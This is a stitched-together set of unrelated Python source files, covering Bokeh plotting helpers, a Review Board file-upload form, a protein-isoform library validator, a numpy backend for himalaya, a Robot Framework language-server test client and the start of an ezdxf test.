        minimum = (1 - padding) * x.min()
        maximum = (1 + padding) * x.max()
        no_log_bounds = [minimum, maximum]
        range_ = (
            log_bounds
            if figure_kwargs.get("x_axis_type", None) is not None
            else no_log_bounds
        )
    # Define default plot and figure keyword arguments.
    fig_kwargs = {
        "plot_width": 700,
        "plot_height": 500,
        # The value axis depends on the orientation.
        "y_range" if orientation == "vertical" else "x_range": range_,
    }
    # Caller-supplied options override the defaults.
    if figure_kwargs:
        fig_kwargs.update(figure_kwargs)
    plt_kwargs = {
        "fill_color": "steelblue",
        "fill_alpha": 0.7,
        "line_color": "white",
        "line_width": 1,
        "line_alpha": 0.7,
        "hover_fill_color": "orange",
        "hover_fill_alpha": 1,
        "hover_line_color": "black",
        "hover_line_width": 2,
        "hover_line_alpha": 1,
    }
    if plot_kwargs:
        plt_kwargs.update(plot_kwargs)
    # Create the plot.
    plot = figure(**fig_kwargs)
    # Bind data to the plot.
    glyph = plot.quad(
        left="left",
        top="top",
        right="right",
        bottom="bottom",
        source=plot_source,
        **plt_kwargs,
    )
    if tooltips is not None:
        tips = HoverTool(renderers=[glyph], tooltips=tooltips)
        plot.add_tools(tips)
    # Style the plot.
    style(plot)
    plot.xaxis.major_label_orientation = np.pi / 4
    if orientation == "vertical":
        # One tick per bar, labelled with the category name.
        plot.xaxis.ticker = FixedTicker(ticks=list(range(len(tick_labels))))
        plot.xaxis.major_label_overrides = dict(zip(range(len(x)), tick_labels))
        plot.xaxis.minor_tick_line_color = None
    if orientation == "horizontal":
        plot.yaxis.ticker = FixedTicker(ticks=list(range(len(tick_labels))))
        plot.yaxis.major_label_overrides = dict(zip(range(len(y)), tick_labels))
        plot.yaxis.minor_tick_line_color = None
    return plot
def scatter_plot(
    plot_source: ColumnDataSource,
    figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
    plot_kwargs: Optional[Union[Dict[str, Any], None]] = None,
    tooltips: Optional[Union[None, List[Tuple[str, str]]]] = None,
) -> Figure:
    """
    Style and create a scatter plot using the given `plot_source`.

    :param plot_source: Bokeh `ColumnDataSource` object.
    :param figure_kwargs: Figure options to pass to the Bokeh figure object.
    :param plot_kwargs: Plot options to pass to the Bokeh figure object.
    :param tooltips: A list of tuples Bokeh can use for hover tips.
    :returns plot: The bar plot using Bokeh as the backend.
    """
    # Merge defaults with caller overrides; caller-supplied keys win.
    fig_kwargs = {
        "plot_width": 700,
        "plot_height": 500,
        **(figure_kwargs or {}),
    }
    plt_kwargs = {
        "size": 10,
        "fill_color": "steelblue",
        "fill_alpha": 0.7,
        "line_color": "white",
        "line_width": 1,
        "line_alpha": 0.7,
        "hover_fill_color": "orange",
        "hover_fill_alpha": 1,
        "hover_line_color": "black",
        "hover_line_width": 2,
        "hover_line_alpha": 1,
        **(plot_kwargs or {}),
    }
    # Create the plot and bind the data.
    plot = figure(**fig_kwargs)
    glyph = plot.circle(x="x", y="y", source=plot_source, **plt_kwargs)
    if tooltips is not None:
        plot.add_tools(HoverTool(renderers=[glyph], tooltips=tooltips))
    # Style the plot.
    style(plot)
    return plot
def line_plot(
    plot_sources: List[ColumnDataSource],
    labels: List[str],
    colors: List[str],
    figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
    tooltips: Optional[Union[None, List[List[Tuple[str, str]]]]] = None,
) -> Figure:
    """
    Style and create a line plot using the given `plot_sources`.

    :param plot_sources: One Bokeh `ColumnDataSource` object per line.
    :param labels: Labels to use in the legend.
    :param colors: Colors to use for multiple lines.
    :param figure_kwargs: Figure options to pass to the Bokeh figure object.
    :param tooltips: A list of tuples Bokeh can use for hover tips, one entry
        per plot source.
    :returns plot: The line plot using Bokeh as the backend.
    """
    if figure_kwargs is None:
        figure_kwargs = {}
    # Define default plot and figure keyword arguments.
    fig_kwargs = {
        "plot_width": 700,
        "plot_height": 500,
    }
    if figure_kwargs:
        fig_kwargs.update(figure_kwargs)
    plot = figure(**fig_kwargs)
    for i, plot_source in enumerate(plot_sources):
        # Bind each renderer to a plain local variable. The previous code
        # wrote to locals()[f"glyph_{i}"], which is undefined behavior inside
        # a function in CPython and only worked by accident.
        glyph = plot.line(
            x="x",
            y="y",
            source=plot_source,
            color=colors[i],
            legend_label=labels[i],
        )
        if tooltips:
            plot.add_tools(
                HoverTool(
                    renderers=[glyph],
                    tooltips=tooltips[i],
                )
            )
    # Style the plot.
    style(plot)
    return plot
|
<gh_stars>100-1000
from __future__ import unicode_literals
from uuid import uuid4
import os
from django import forms
from reviewboard.attachments.mimetypes import get_uploaded_file_mimetype
from reviewboard.attachments.models import (FileAttachment,
FileAttachmentHistory)
from reviewboard.reviews.models import ReviewRequestDraft
class UploadFileForm(forms.Form):
    """A form that handles uploading of new files."""

    #: The caption for the file.
    caption = forms.CharField(required=False)

    #: The file itself.
    path = forms.FileField(required=True)

    #: An optional file attachment history.
    #:
    #: This is used when creating a new revision for an existing file
    #: attachment. If this is not specified, a new history will be created.
    attachment_history = forms.ModelChoiceField(
        queryset=FileAttachmentHistory.objects.all(),
        required=False)

    def __init__(self, review_request, *args, **kwargs):
        """Initialize the form.

        Args:
            review_request (reviewboard.reviews.models.ReviewRequest):
                The review request to attach the file to.

            args (tuple):
                Extra positional arguments for the form.

            **kwargs (dict):
                Extra keyword arguments for the form.
        """
        super(UploadFileForm, self).__init__(*args, **kwargs)

        self.review_request = review_request

    def clean_attachment_history(self):
        """Validate that the specified file attachment history exists.

        Returns:
            reviewboard.attachments.models.FileAttachmentHistory:
            The history model.
        """
        history = self.cleaned_data['attachment_history']

        # The chosen history must belong to this review request; otherwise a
        # caller could attach revisions onto an unrelated request.
        if (history is not None and
            not self.review_request.file_attachment_histories.filter(
                pk=history.pk).exists()):
            raise forms.ValidationError(
                'The FileAttachmentHistory provided is not part of this '
                'review request.')

        return history

    def create(self, filediff=None):
        """Create a FileAttachment based on this form.

        Args:
            filediff (reviewboard.diffviewer.models.filediff.FileDiff, optional):
                The optional diff to attach this file to (for use when this
                file represents a binary file within the diff).

        Returns:
            reviewboard.attachments.models.FileAttachment:
            The new file attachment model.
        """
        file_obj = self.files['path']
        caption = self.cleaned_data['caption'] or file_obj.name
        mimetype = get_uploaded_file_mimetype(file_obj)
        # Prefix the stored filename with a UUID to avoid collisions.
        filename = get_unique_filename(file_obj.name)

        if self.cleaned_data['attachment_history'] is None:
            # This is a new file: create a new FileAttachmentHistory for it
            attachment_history = FileAttachmentHistory()
            attachment_revision = 1

            attachment_history.display_position = \
                FileAttachmentHistory.compute_next_display_position(
                    self.review_request)
            attachment_history.save()
            self.review_request.file_attachment_histories.add(
                attachment_history)
        else:
            attachment_history = self.cleaned_data['attachment_history']

            try:
                latest = attachment_history.file_attachments.latest()
            except FileAttachment.DoesNotExist:
                latest = None

            if latest is None:
                # This should theoretically never happen, but who knows.
                attachment_revision = 1
            elif latest.review_request.exists():
                # This is a new update in the draft.
                attachment_revision = latest.attachment_revision + 1
            else:
                # The most recent revision is part of the same draft. Delete it
                # and replace with the newly uploaded file.
                attachment_revision = latest.attachment_revision
                latest.delete()

        # The caption lives only on the draft ('caption' stays empty) until
        # the draft is published.
        attachment_kwargs = {
            'attachment_history': attachment_history,
            'attachment_revision': attachment_revision,
            'caption': '',
            'draft_caption': caption,
            'orig_filename': os.path.basename(file_obj.name),
            'mimetype': mimetype,
        }

        if filediff:
            file_attachment = FileAttachment.objects.create_from_filediff(
                filediff,
                save=False,
                **attachment_kwargs)
        else:
            file_attachment = FileAttachment(**attachment_kwargs)

        file_attachment.file.save(filename, file_obj, save=True)

        # Attach the new file to the review request's draft.
        draft = ReviewRequestDraft.create(self.review_request)
        draft.file_attachments.add(file_attachment)
        draft.save()

        return file_attachment
class UploadUserFileForm(forms.Form):
    """A form that handles uploading of user files."""

    #: The caption for the file.
    caption = forms.CharField(required=False)

    #: The file itself. Optional: a caption-only attachment may be created
    #: without any file content.
    path = forms.FileField(required=False)

    def create(self, user, local_site=None):
        """Create a FileAttachment based on this form.

        Args:
            user (django.contrib.auth.models.User):
                The user who owns this file attachment.

            local_site (reviewboard.site.models.LocalSite, optional):
                The optional local site.

        Returns:
            reviewboard.attachments.models.FileAttachment:
            The new file attachment model.
        """
        file_obj = self.files.get('path')

        attachment_kwargs = {
            'uuid': uuid4(),
            'user': user,
            'local_site': local_site,
        }

        if file_obj:
            mimetype = get_uploaded_file_mimetype(file_obj)
            filename = get_unique_filename(file_obj.name)

            attachment_kwargs.update({
                'caption': self.cleaned_data['caption'] or file_obj.name,
                'orig_filename': os.path.basename(file_obj.name),
                'mimetype': mimetype,
            })

            file_attachment = FileAttachment(**attachment_kwargs)
            # Saving the file also saves the model (save=True).
            file_attachment.file.save(filename, file_obj, save=True)
        else:
            # No file content: create a placeholder attachment with just a
            # caption.
            attachment_kwargs['caption'] = self.cleaned_data['caption'] or ''

            file_attachment = FileAttachment.objects.create(
                **attachment_kwargs)

        return file_attachment

    def update(self, file_attachment):
        """Update an existing file attachment.

        Args:
            file_attachment (reviewboard.attachments.models.FileAttachment):
                The file attachment to update.

        Returns:
            reviewboard.attachments.models.FileAttachment:
            The updated file attachment.
        """
        caption = self.cleaned_data['caption']
        file_obj = self.files.get('path')

        # Both fields are optional; only overwrite what was provided.
        if caption:
            file_attachment.caption = caption

        if file_obj:
            file_attachment.mimetype = get_uploaded_file_mimetype(file_obj)
            file_attachment.orig_filename = os.path.basename(file_obj.name)
            file_attachment.file.save(get_unique_filename(file_obj.name),
                                      file_obj, save=True)

        file_attachment.save()

        return file_attachment
def get_unique_filename(filename):
    """Return a unique filename.

    Prefix the given filename with a freshly generated UUID, separated by a
    double underscore.

    Args:
        filename (unicode):
            The original filename.

    Returns:
        unicode:
            A new filename which is more unique.
    """
    return '{0}__{1}'.format(uuid4(), filename)
|
<filename>Library_Generation/Validation_of_library.py
from IsoAligner_core.Protein_isoform import *
from IsoAligner_core.Alignment import *
class Validate_library():
    """Sanity checks and clean-up passes over the isoform library
    (a list of gene objects, each holding a protein_sequence_isoform_collection)."""
    pass

    @staticmethod
    def check_if_there_are_AA_seq_duplicates(list_of_gene_objects):
        '''
        check out if there were IDs and Seq that are the same but escaped the match
        :param list_of_gene_objects:
        :return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
        '''

        def duplicates(lst, item):
            # All positions of `item` within `lst`.
            return [i for i, x in enumerate(lst) if x == item]

        genes_without_AA_seq = 0
        duplicates_number = 0
        genes_without_duplicates = 0
        genes_with_more_than_one_duplicate = 0
        redundant_sequences = 0
        duplicate_genes_dict = dict()
        for index, gene in enumerate(list_of_gene_objects):
            # Genes whose collection is not a list have no AA sequences at all.
            if type(gene.protein_sequence_isoform_collection) == list:
                List = [sequence.protein_sequence for sequence in gene.protein_sequence_isoform_collection]
                # Map each repeated sequence to the indexes of its occurrences.
                duplicates_dict = dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1)
                if len(duplicates_dict) != 0:
                    # Ignore the degenerate case where the duplicated "sequence"
                    # is None.
                    if list(duplicates_dict.keys())[0] != None:
                        duplicate_genes_dict[index] = duplicates_dict
                        duplicates_number += 1
                        for sequence, objects in duplicates_dict.items():
                            redundant_sequences = redundant_sequences + len(objects)
                        if len(duplicates_dict) > 1:
                            genes_with_more_than_one_duplicate += 1
                else:
                    genes_without_duplicates += 1
            else:
                genes_without_AA_seq += 1
        print('number of genes: ', len(list_of_gene_objects))
        print('genes with no AA seq: ', genes_without_AA_seq)
        print('number of genes with AA seq duplicates: ', duplicates_number)
        print('number of genes without AA seq duplicates: ', genes_without_duplicates)
        print('number of redundant AA sequences:', redundant_sequences)
        print('number of genes with more than one AA seq duplicate: ', genes_with_more_than_one_duplicate)
        return duplicate_genes_dict, duplicates_number, genes_without_duplicates, redundant_sequences, genes_with_more_than_one_duplicate

    @staticmethod
    def check_if_there_are_exact_duplicates(list_of_gene_objects):
        '''
        note: function does not work because exon collection attribute is a list which is not hashable
        check out if there were IDs and Seq that are the same but escaped the match
        :param list_of_gene_objects:
        :return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
        '''

        def duplicates(lst, item):
            # All positions of `item` within `lst`.
            return [i for i, x in enumerate(lst) if x == item]

        genes_without_AA_seq = 0
        duplicates_number = 0
        genes_without_duplicates = 0
        genes_with_more_than_one_duplicate = 0
        duplicate_genes_dict = dict()
        for index, gene in enumerate(list_of_gene_objects):
            if type(gene.protein_sequence_isoform_collection) == list:
                # Compare isoforms by their full attribute dict, not just the
                # AA sequence.
                List = [tuple(list(sequence.__dict__.items())) for sequence in gene.protein_sequence_isoform_collection]
                print(dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1))
                duplicates_dict = dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1)
                if len(duplicates_dict) != 0:
                    if list(duplicates_dict.keys())[0] != None:
                        duplicate_genes_dict[index] = duplicates_dict
                        duplicates_number += 1
                        if len(duplicates_dict) > 1:
                            genes_with_more_than_one_duplicate += 1
                else:
                    genes_without_duplicates += 1
            else:
                genes_without_AA_seq += 1
        print('number of genes: ', len(list_of_gene_objects))
        print('genes with no AA seq: ', genes_without_AA_seq)
        print('number of genes with exact duplicates: ', duplicates_number)
        print('number of genes without exact duplicates: ', genes_without_duplicates)
        print('number of genes with more than one exact duplicate: ', genes_with_more_than_one_duplicate)
        return duplicate_genes_dict

    @staticmethod
    def check_if_there_gene_names_duplicates_over_all_genes(list_of_gene_objects):
        '''
        check out if there were IDs and Seq that are the same but escaped the match
        :param list_of_gene_objects:
        :return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
        '''

        def duplicates(lst, item):
            # All positions of `item` within `lst`.
            return [i for i, x in enumerate(lst) if x == item]

        list_of_all_names = []
        for index, gene in enumerate(list_of_gene_objects):
            list_of_all_names.append(gene.ensembl_gene_symbol)
        duplicates_dict_gene = dict(
            (x, duplicates(list_of_all_names, x)) for x in set(list_of_all_names) if list_of_all_names.count(x) > 1)
        print(duplicates_dict_gene)
        print('gene object with same name:', len(duplicates_dict_gene))
        return duplicates_dict_gene

    @staticmethod
    def fuse_gene_objects_with_same_name(list_of_gene_objects, duplicates_dict_gene):
        # Not implemented yet.
        pass

    @staticmethod
    def fuse_attributes_of_duplicated_AA_seq_within_gene_object(list_of_gene_objects, duplicate_genes_dict):
        '''
        function that fuses protein isoform objects if the attributes can complement each other to one big object, otherwise the duplicates will stay separated.
        :param list_of_gene_objects:
        :param duplicate_genes_dict:
        :return: updated list_of_gene_objects
        '''
        reduced_isoform_count = 0
        couldnotmatch = 0
        duplicates_in_total = 0
        for gene, duplicates_dict in duplicate_genes_dict.items():
            tobedeleted = []
            duplicates_in_total = duplicates_in_total + len(duplicates_dict)
            for duplicate_AA in duplicates_dict.items():
                # Fresh isoform object seeded with the duplicated AA sequence;
                # attributes are merged into it from each duplicate.
                new_object_attributes = Protein_isoform(duplicate_AA[0])
                isoform_dict = dict()  # (unused)
                list_of_attributes = [a for a in dir(new_object_attributes) if not a.startswith('__')]
                different_attributes = False
                for isoform in duplicate_AA[1]:
                    if different_attributes:
                        break
                    isoform = list_of_gene_objects[gene].protein_sequence_isoform_collection[isoform]
                    for attribute in list_of_attributes:
                        if different_attributes:
                            break
                        if getattr(new_object_attributes, attribute) == None:
                            # First value seen for this attribute wins.
                            if getattr(isoform, attribute) != None:
                                setattr(new_object_attributes, attribute, getattr(isoform, attribute))
                        else:
                            if getattr(isoform, attribute) != None:
                                if getattr(isoform, attribute) == getattr(new_object_attributes, attribute):
                                    pass  # attributes are the same, protein object can still be fused
                                else:  # stop process, IDs differ from each other
                                    different_attributes = True
                                    couldnotmatch += 1
                if different_attributes == False:
                    # All duplicates agreed: replace them with the fused object.
                    tobedeleted.extend(duplicate_AA[1])
                    list_of_gene_objects[gene].protein_sequence_isoform_collection.append(new_object_attributes)
                    reduced_isoform_count += 1
            if tobedeleted:
                # Delete from the highest index down so earlier indexes stay valid.
                for ele in sorted(tobedeleted, reverse=True):
                    del list_of_gene_objects[gene].protein_sequence_isoform_collection[ele]
        print('duplicates in total:', duplicates_in_total)
        print('duplicates that could not be matched:', couldnotmatch)
        print('duplicates that could be matched:', reduced_isoform_count)
        return list_of_gene_objects

    @staticmethod
    def check_if_gene_name_and_prot_seq_are_switched(list_of_gene_objects):
        '''somewhere in the database generation gene name and protein sequence attribute of a protein isoform object are being falsely switched'''
        false_assigned_gene_name_isoform = 0
        for gene in list_of_gene_objects:
            if type(gene.protein_sequence_isoform_collection) == list:
                for isoform in gene.protein_sequence_isoform_collection:
                    if type(isoform.gene_name) == str:
                        # If the "gene name" parses as an AA sequence, the two
                        # fields were presumably swapped.
                        if Alignment.extract_only_AA_of_Fasta_file(isoform.gene_name) != None:
                            false_assigned_gene_name_isoform += 1
        print('number of falsely assigned AA seq to gene_name:', false_assigned_gene_name_isoform)

    @staticmethod
    def delete_genes_and_protein_isoforms_with_no_AA_seq(list_of_gene_objects):
        '''
        function that deletes empty gene_objects
        :param list_of_gene_objects:
        :return: updated list of gene objects
        '''
        tobedeletedgene = []
        one_AA_seq = 0
        for index, gene in enumerate(list_of_gene_objects):
            if type(gene.protein_sequence_isoform_collection) != list:
                tobedeletedgene.append(index)
            else:
                if len(gene.protein_sequence_isoform_collection) == 1:
                    one_AA_seq += 1
        if tobedeletedgene:
            # Delete from the highest index down so earlier indexes stay valid.
            for ele in sorted(tobedeletedgene, reverse=True):
                del list_of_gene_objects[ele]
        deleted = 0
        for index_gene, gene in enumerate(list_of_gene_objects):
            tobedeletedisoform = []
            for index, isoform in enumerate(gene.protein_sequence_isoform_collection):
                if isoform.protein_sequence == None:
                    tobedeletedisoform.append(index)
            if tobedeletedisoform:
                for ele in sorted(tobedeletedisoform, reverse=True):
                    del list_of_gene_objects[index_gene].protein_sequence_isoform_collection[ele]
                    deleted += 1
        print('no AA seq Isoforms deleted:', deleted)
        print('genes with just one isoform:', one_AA_seq)
        return list_of_gene_objects
<reponame>mvdoc/himalaya<gh_stars>10-100
import numpy as np
try:
import scipy.linalg as linalg
use_scipy = True
except ImportError:
import numpy.linalg as linalg
use_scipy = False
###############################################################################
def apply_argmax(array, argmax, axis):
    """Apply precomputed argmax indices to a multi-dimensional array.

    ``array[np.argmax(array)]`` works fine in dimension 1, but not in higher
    ones; this helper extends the idiom to arbitrary dimensions.

    Examples
    --------
    >>> import numpy as np
    >>> array = np.random.randn(10, 4, 8)
    >>> argmax = np.argmax(array, axis=1)
    >>> max_ = apply_argmax(array, argmax, axis=1)
    >>> assert np.all(max_ == np.max(array, axis=1))
    """
    # Give the index array a singleton dimension on `axis` so it broadcasts,
    # gather along that axis, then drop the singleton dimension again.
    expanded_indices = np.expand_dims(argmax, axis=axis)
    gathered = np.take_along_axis(array, expanded_indices, axis=axis)
    return gathered.squeeze(axis=axis)
def std_float64(array, axis=None, demean=True, keepdims=False):
    """Compute the standard deviation of ``array`` with double precision,
    and cast back the result to the original dtype.

    Parameters
    ----------
    array : ndarray
        Input array.
    axis : int or None
        Axis over which to compute; None reduces over all elements.
    demean : bool
        If True (default), subtract the mean first (regular standard
        deviation). If False, return ``sqrt(mean(array ** 2))`` without
        removing the mean. (Previously this parameter was silently
        ignored and the mean was always removed.)
    keepdims : bool
        Whether to keep the reduced axis with size one.
    """
    if demean:
        result = array.std(axis, dtype=np.float64, keepdims=keepdims)
    else:
        array_64 = np.asarray(array, dtype=np.float64)
        result = np.sqrt((array_64 ** 2).mean(axis=axis, keepdims=keepdims))
    return result.astype(array.dtype, copy=False)
def mean_float64(array, axis=None, keepdims=False):
    """Compute the mean of ``array`` with double precision, then cast the
    result back to the original dtype."""
    accumulated = array.mean(axis, dtype=np.float64, keepdims=keepdims)
    return accumulated.astype(array.dtype, copy=False)
###############################################################################
# Flat "backend API": this module exposes a common set of array functions as
# module-level names so callers can write backend.max / backend.sum etc.
# Several names intentionally shadow Python builtins (bool, abs, any, all,
# max, min, sum) because the module is always used fully qualified.
name = "numpy"
argmax = np.argmax
max = np.max
min = np.min
abs = np.abs
randn = np.random.randn
rand = np.random.rand
matmul = np.matmul
transpose = np.transpose
stack = np.stack
concatenate = np.concatenate
sum = np.sum
sqrt = np.sqrt
any = np.any
all = np.all
nan = np.nan
inf = np.inf
isnan = np.isnan
isinf = np.isinf
logspace = np.logspace
copy = np.copy
bool = np.bool_
float32 = np.float32
float64 = np.float64
int32 = np.int32
# linalg is scipy.linalg when available, numpy.linalg otherwise (see the
# try/except at the top of this file).
eigh = linalg.eigh
norm = linalg.norm
log = np.log
exp = np.exp
arange = np.arange
flatnonzero = np.flatnonzero
isin = np.isin
searchsorted = np.searchsorted
unique = np.unique
einsum = np.einsum
tanh = np.tanh
power = np.power
prod = np.prod
zeros = np.zeros
clip = np.clip
sign = np.sign
sort = np.sort
flip = np.flip
atleast_1d = np.atleast_1d
finfo = np.finfo
def diagonal_view(array, axis1=0, axis2=1):
    """Return a view of the array diagonal over axes ``axis1``/``axis2``.

    The two diagonal axes are removed and the diagonal is appended as the
    last dimension; the result shares memory with ``array``.
    """
    assert array.ndim >= 2
    # Note: `min`/`max`/`sorted` are called with list arguments because in
    # this module `min` and `max` are the numpy reductions, not the builtins.
    first, second = sorted([axis1, axis2])
    diag_length = min([array.shape[first], array.shape[second]])
    new_shape = [size for ax, size in enumerate(array.shape)
                 if ax not in (first, second)]
    new_shape.append(diag_length)
    # Stepping by the sum of both strides walks down the diagonal.
    new_strides = [stride for ax, stride in enumerate(array.strides)
                   if ax not in (first, second)]
    new_strides.append(array.strides[first] + array.strides[second])
    return np.lib.stride_tricks.as_strided(array, shape=new_shape,
                                           strides=new_strides)
def to_numpy(array):
    """Return the input unchanged: numpy arrays already live in host memory."""
    return array


def zeros_like(array, shape=None, dtype=None, device=None):
    """``np.zeros_like`` with an optional ``shape`` override (``device`` ignored)."""
    target_shape = array.shape if shape is None else shape
    target_dtype = array.dtype if dtype is None else dtype
    return np.zeros(target_shape, dtype=target_dtype)


def ones_like(array, shape=None, dtype=None, device=None):
    """``np.ones_like`` with an optional ``shape`` override (``device`` ignored)."""
    target_shape = array.shape if shape is None else shape
    target_dtype = array.dtype if dtype is None else dtype
    return np.ones(target_shape, dtype=target_dtype)


def full_like(array, fill_value, shape=None, dtype=None, device=None):
    """``np.full_like`` with an optional ``shape`` override (``device`` ignored)."""
    target_shape = array.shape if shape is None else shape
    target_dtype = array.dtype if dtype is None else dtype
    return np.full(target_shape, fill_value, dtype=target_dtype)


def to_cpu(array):
    """No-op for the numpy backend: data is already on CPU."""
    return array


def to_gpu(array, device=None):
    """No-op for the numpy backend: there is no GPU to move to."""
    return array


def is_in_gpu(array):
    """Numpy arrays never live on a GPU."""
    return False


def asarray_like(x, ref):
    """Cast ``x`` to an array with the same dtype as ``ref``."""
    return np.asarray(x, dtype=ref.dtype)
def check_arrays(*all_inputs):
    """Cast all inputs to arrays (or lists of arrays) with the precision of
    the first input. ``None`` inputs are passed through unchanged.
    """
    first = asarray(all_inputs[0])
    dtype = first.dtype
    checked = [first]
    for item in all_inputs[1:]:
        if isinstance(item, list):
            item = [asarray(element, dtype=dtype) for element in item]
        elif item is not None:
            item = asarray(item, dtype=dtype)
        checked.append(item)
    return checked


def asarray(a, dtype=None, order=None, device=None):
    """Cast ``a`` to a numpy array, accepting numpy arrays, lists, torch
    tensors, cupy arrays, and other array-likes (``device`` is ignored)."""

    def _plain(x):
        # numpy, lists, torch CPU tensors, and others
        return x

    def _from_cupy(x):
        import cupy
        return cupy.asnumpy(x)

    def _from_torch_cuda(x):
        return x.cpu()

    for convert in (_plain, _from_cupy, _from_torch_cuda):
        try:
            return np.asarray(convert(a), dtype=dtype, order=order)
        except Exception:
            pass
    # Last resort: let numpy raise its own informative error.
    return np.asarray(a, dtype=dtype, order=order)
def svd(X, full_matrices=True):
    """Singular value decomposition of a 2D array, or of each matrix in a
    3D stack (the stacked case requires scipy's ``linalg.svd``)."""
    if X.ndim == 2 or not use_scipy:
        return linalg.svd(X, full_matrices=full_matrices)
    if X.ndim == 3:
        decompositions = [linalg.svd(Xi, full_matrices=full_matrices)
                          for Xi in X]
        # Transpose [(U, s, V), ...] into stacked U, s, V.
        return map(np.stack, zip(*decompositions))
    raise NotImplementedError()
|
import logging
from robotframework_ls.client_base import LanguageServerClientBase
# Module-level logger (kept for parity with the other test helper modules).
log = logging.getLogger(__name__)


class _LanguageServerClient(LanguageServerClientBase):
    """JSON-RPC test client for the Robot Framework language server.

    Thin convenience wrapper used by the test-suite: each method builds one
    LSP message (initialize, didOpen, didChange, completion, formatting,
    definition) and sends it through the base class transport.
    """

    def __init__(self, *args, **kwargs):
        LanguageServerClientBase.__init__(self, *args, **kwargs)

        # Fail fast in tests: reuse the test-suite's shared timeout.
        from robotframework_ls_tests import fixtures

        self.DEFAULT_TIMEOUT = fixtures.TIMEOUT

    def settings(self, settings):
        """Push a settings dict to the server.

        NOTE(review): workspace/didChangeConfiguration is a notification in
        the LSP spec, but it is sent here as a request (with an id) — the
        server presumably tolerates this; confirm before changing.
        """
        self.request(
            {
                "jsonrpc": "2.0",
                "id": self.next_id(),
                "method": "workspace/didChangeConfiguration",
                "params": settings,
            }
        )

    def initialize(self, root_path, msg_id=None, process_id=None):
        """Send the LSP ``initialize`` request for ``root_path`` and return
        the server's response, asserting that it advertises capabilities."""
        from robotframework_ls.uris import from_fs_path

        msg_id = msg_id if msg_id is not None else self.next_id()
        msg = self.request(
            {
                "jsonrpc": "2.0",
                "id": msg_id,
                "method": "initialize",
                "params": {
                    "processId": process_id,
                    "rootPath": root_path,
                    "rootUri": from_fs_path(root_path),
                    # Client capabilities advertised to the server; mirrors a
                    # typical editor client configuration.
                    "capabilities": {
                        "workspace": {
                            "applyEdit": True,
                            "didChangeConfiguration": {"dynamicRegistration": True},
                            "didChangeWatchedFiles": {"dynamicRegistration": True},
                            "symbol": {"dynamicRegistration": True},
                            "executeCommand": {"dynamicRegistration": True},
                        },
                        "textDocument": {
                            "synchronization": {
                                "dynamicRegistration": True,
                                "willSave": True,
                                "willSaveWaitUntil": True,
                                "didSave": True,
                            },
                            "completion": {
                                "dynamicRegistration": True,
                                "completionItem": {
                                    "snippetSupport": True,
                                    "commitCharactersSupport": True,
                                },
                            },
                            "hover": {"dynamicRegistration": True},
                            "signatureHelp": {"dynamicRegistration": True},
                            "definition": {"dynamicRegistration": True},
                            "references": {"dynamicRegistration": True},
                            "documentHighlight": {"dynamicRegistration": True},
                            "documentSymbol": {"dynamicRegistration": True},
                            "codeAction": {"dynamicRegistration": True},
                            "codeLens": {"dynamicRegistration": True},
                            "formatting": {"dynamicRegistration": True},
                            "rangeFormatting": {"dynamicRegistration": True},
                            "onTypeFormatting": {"dynamicRegistration": True},
                            "rename": {"dynamicRegistration": True},
                            "documentLink": {"dynamicRegistration": True},
                        },
                    },
                    "trace": "off",
                },
            }
        )
        assert "capabilities" in msg["result"]
        return msg

    def open_doc(self, uri, version=1, text=""):
        """
        Notify the server that a document was opened (didOpen notification).

        :param text:
            If None, the contents will be loaded from the disk.
        """
        # didOpen is a notification: written directly, no response expected.
        self.write(
            {
                "jsonrpc": "2.0",
                "method": "textDocument/didOpen",
                "params": {
                    "textDocument": {
                        "uri": uri,
                        "languageId": "robotframework",
                        "version": version,
                        "text": text,
                    }
                },
            }
        )

    def change_doc(self, uri, version, text):
        """Notify the server that document ``uri`` now holds ``text``."""
        self.write(
            {
                "jsonrpc": "2.0",
                "method": "textDocument/didChange",
                "params": {
                    "textDocument": {"uri": uri, "version": version},
                    # range=None signals a full-document replacement.
                    "contentChanges": [{"range": None, "rangeLength": 0, "text": text}],
                },
            }
        )

    def get_completions(self, uri, line, col):
        """Request completions at the given 0-based line/column."""
        return self.request(
            {
                "jsonrpc": "2.0",
                "id": self.next_id(),
                "method": "textDocument/completion",
                "params": {
                    "textDocument": {"uri": uri},
                    "position": {"line": line, "character": col},
                },
            }
        )

    def request_source_format(self, uri):
        """Request a full-document formatting edit for ``uri``."""
        return self.request(
            {
                "jsonrpc": "2.0",
                "id": self.next_id(),
                "method": "textDocument/formatting",
                "params": {"textDocument": {"uri": uri}},
            }
        )

    def find_definitions(self, uri, line, col):
        """Request go-to-definition targets at the given 0-based position."""
        return self.request(
            {
                "jsonrpc": "2.0",
                "id": self.next_id(),
                "method": "textDocument/definition",
                "params": {
                    "textDocument": {"uri": uri},
                    "position": {"line": line, "character": col},
                },
            }
        )
|
<reponame>hh-wu/ezdxf
# Copyright (c) 2019 <NAME>
# License: MIT License
import pytest
from copy import deepcopy
from ezdxf.math import Vector
from ezdxf.entities.dxfentity import base_class, DXFAttributes, DXFNamespace, SubclassProcessor
from ezdxf.entities.dxfgfx import acdb_entity
from ezdxf.entities.line import acdb_line
from ezdxf.lldxf.extendedtags import ExtendedTags
from ezdxf.lldxf.const import DXFAttributeError
from ezdxf.lldxf.tagwriter import TagCollector
class DXFEntity:
    """ Mockup """
    # Minimal stand-in for a real DXF entity: just the type tag plus the
    # combined attribute definitions of base class + AcDbEntity + AcDbLine.
    DXFTYPE = 'DXFENTITY'
    DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_line)
@pytest.fixture
def entity():
    # Fresh mockup entity per test.
    return DXFEntity()


@pytest.fixture
def processor():
    # SubclassProcessor fed with the minimal tag stream TEST_1 defined at the
    # bottom of this module (handle 'FFFF', owner 'ABBA').
    return SubclassProcessor(ExtendedTags.from_text(TEST_1))
def test_handle_and_owner(entity, processor):
    # handle/owner come from the TEST_1 tag stream: (5, 'FFFF'), (330, 'ABBA').
    attribs = DXFNamespace(processor, entity)
    assert attribs.handle == 'FFFF'
    assert attribs.owner == 'ABBA'
    assert attribs._entity is entity


def test_default_values(entity, processor):
    # Unset attributes fall back to their DXF default values...
    attribs = DXFNamespace(processor, entity)
